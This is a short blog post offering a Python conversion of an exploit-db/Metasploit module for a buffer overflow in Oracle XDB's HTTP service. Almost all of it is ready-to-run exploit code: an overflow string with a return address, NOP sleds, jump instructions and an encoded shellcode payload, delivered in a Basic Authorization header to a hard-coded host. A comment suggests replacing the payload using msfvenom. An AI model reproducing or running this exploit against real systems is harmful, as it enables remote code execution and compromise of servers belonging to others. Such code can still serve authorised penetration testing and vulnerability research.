Tuesday, April 5, 2016

Oracle XDB HTTP PASS Buffer Overflow in Python

I had to convert the msf module https://www.exploit-db.com/exploits/16809/ to python for a project so here it is:


#!/usr/bin/env python
#converted from https://www.exploit-db.com/exploits/16809/
#@atucom
import socket
import base64
rhost = '192.168.1.10'
rport = 8080
target = (rhost,rport)
#ret = "60616d46"
ret = "\x46\x6d\x61\x60" #Universal ret

#use msfvenom to change to your own payload
buf = "\xb8\xad\x82\x42\xbe\xdb\xcb\xd9\x74\x24\xf4\x5d\x29\xc9" +\
      "\xb1\x47\x83\xc5\x04\x31\x45\x0f\x03\x45\xa2\x60\xb7\x42" +\
      "\x54\xe6\x38\xbb\xa4\x87\xb1\x5e\x95\x87\xa6\x2b\x85\x37" +\
      "\xac\x7e\x29\xb3\xe0\x6a\xba\xb1\x2c\x9c\x0b\x7f\x0b\x93" +\
      "\x8c\x2c\x6f\xb2\x0e\x2f\xbc\x14\x2f\xe0\xb1\x55\x68\x1d" +\
      "\x3b\x07\x21\x69\xee\xb8\x46\x27\x33\x32\x14\xa9\x33\xa7" +\
      "\xec\xc8\x12\x76\x67\x93\xb4\x78\xa4\xaf\xfc\x62\xa9\x8a" +\
      "\xb7\x19\x19\x60\x46\xc8\x50\x89\xe5\x35\x5d\x78\xf7\x72" +\
      "\x59\x63\x82\x8a\x9a\x1e\x95\x48\xe1\xc4\x10\x4b\x41\x8e" +\
      "\x83\xb7\x70\x43\x55\x33\x7e\x28\x11\x1b\x62\xaf\xf6\x17" +\
      "\x9e\x24\xf9\xf7\x17\x7e\xde\xd3\x7c\x24\x7f\x45\xd8\x8b" +\
      "\x80\x95\x83\x74\x25\xdd\x29\x60\x54\xbc\x25\x45\x55\x3f" +\
      "\xb5\xc1\xee\x4c\x87\x4e\x45\xdb\xab\x07\x43\x1c\xcc\x3d" +\
      "\x33\xb2\x33\xbe\x44\x9a\xf7\xea\x14\xb4\xde\x92\xfe\x44" +\
      "\xdf\x46\x50\x15\x4f\x39\x11\xc5\x2f\xe9\xf9\x0f\xa0\xd6" +\
      "\x1a\x30\x6b\x7f\xb0\xca\xfb\x40\xed\xfd\xad\x28\xec\xfd" +\
      "\x40\x68\x79\x1b\x08\x7a\x2c\xb3\xa4\xe3\x75\x4f\x55\xeb" +\
      "\xa3\x35\x55\x67\x40\xc9\x1b\x80\x2d\xd9\xcb\x60\x78\x83" +\
      "\x5d\x7e\x56\xae\x61\xea\x5d\x79\x36\x82\x5f\x5c\x70\x0d" +\
      "\x9f\x8b\x0b\x84\x35\x74\x63\xe9\xd9\x74\x73\xbf\xb3\x74" +\
      "\x1b\x67\xe0\x26\x3e\x68\x3d\x5b\x93\xfd\xbe\x0a\x40\x55" +\
      "\xd7\xb0\xbf\x91\x78\x4a\xea\x23\x44\x9d\xd2\x51\xa4\x1d"

sploit1 = "A" * 4 + ":" + "A" * 442 + "\xeb\x64" + "\x90\x90" + ret + "\x90" *266 + "\xeb\x10" + "\x90" * 109 + buf
req  = "Authorization: Basic "+ base64.b64encode(sploit1) +"\r\n\r\n"
res  = "GET / HTTP/1.1\r\n" + "Host: " +rhost+":"+str(rport)+"\r\n" + req
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
s.send(res)

No comments:

Post a Comment